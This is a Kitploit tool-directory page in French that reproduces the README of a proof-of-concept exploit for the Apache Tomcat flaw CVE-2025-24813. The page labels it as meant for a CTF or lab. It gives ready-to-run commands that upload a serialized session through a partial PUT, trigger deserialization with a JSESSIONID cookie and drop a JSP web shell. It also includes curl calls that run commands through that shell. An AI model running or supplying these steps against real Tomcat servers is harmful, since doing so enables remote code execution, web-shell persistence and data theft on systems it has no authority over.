Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24813 — right payload for java CVE | Kitploit
Outils/GitHubGitHub/loufa0/cve-2025-24813
Vulnerability ScannersExploitationWeb SecurityCTFLearning & EducationLabs & Practice
GitHubloufa0/cve-2025-24813

CVE-2025-24813

right payload for java CVE

Voir le dépôt
il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24813 Tomcat PoC

PoC pour un environnement CTF/lab autorisé. Il exploite CVE-2025-24813 via l'ecriture PUT partielle d'un fichier de session Tomcat, puis declenche la deserialisation avec JSESSIONID.

Prerequis

  • Python 3
  • Module Python requests
  • Java JDK (java et javac)
  • Le fichier inclus commons-collections-3.2.1.jar, place dans ce dossier

ysoserial n'est pas requis.

Fichiers

  • poc_cve_2025_24813.py: wrapper Python qui automatise generation, upload et trigger.
  • GenerateTomcatSessionPayload.java: genere une session Tomcat valide contenant un gadget CommonsCollections.
  • commons-collections-3.2.1.jar: dependance du gadget.
  • sh.jsp: JSP shell optionnel deploye par --drop-shell.

Utilisation

Deposer un JSP shell dans le webroot par defaut /opt/tomcat/webapps/ROOT:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id poc24813 \
  --drop-shell \
  --shell-name sh.jsp

Executer une commande directe sans deposer de shell:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id cmd24813 \
  --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'

Si le webroot est different:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --drop-shell \
  --webroot /path/to/webroot \
  --shell-name sh.jsp

Si le JAR est deplace, indiquer son chemin:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --jar /path/to/commons-collections-3.2.1.jar \
  --drop-shell

Apres exploitation

Si --drop-shell reussit:

root@kitploit:~
curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp

Conditions cote cible

  • Version Tomcat vulnerable.
  • DefaultServlet writable, typiquement readonly=false.
  • Support du partial PUT.
  • Sessions persistantes via PersistentManager et FileStore.
  • Gadget chain disponible cote serveur, ici commons-collections.

Le comportement attendu lors de l'upload est souvent HTTP 409 Conflict sur:

root@kitploit:~
PUT /<session-id>/session
Content-Range: bytes 0-1000/1200

Puis la deserialisation est declenchee avec:

root@kitploit:~
Cookie: JSESSIONID=.<session-id>
Télécharger l’outil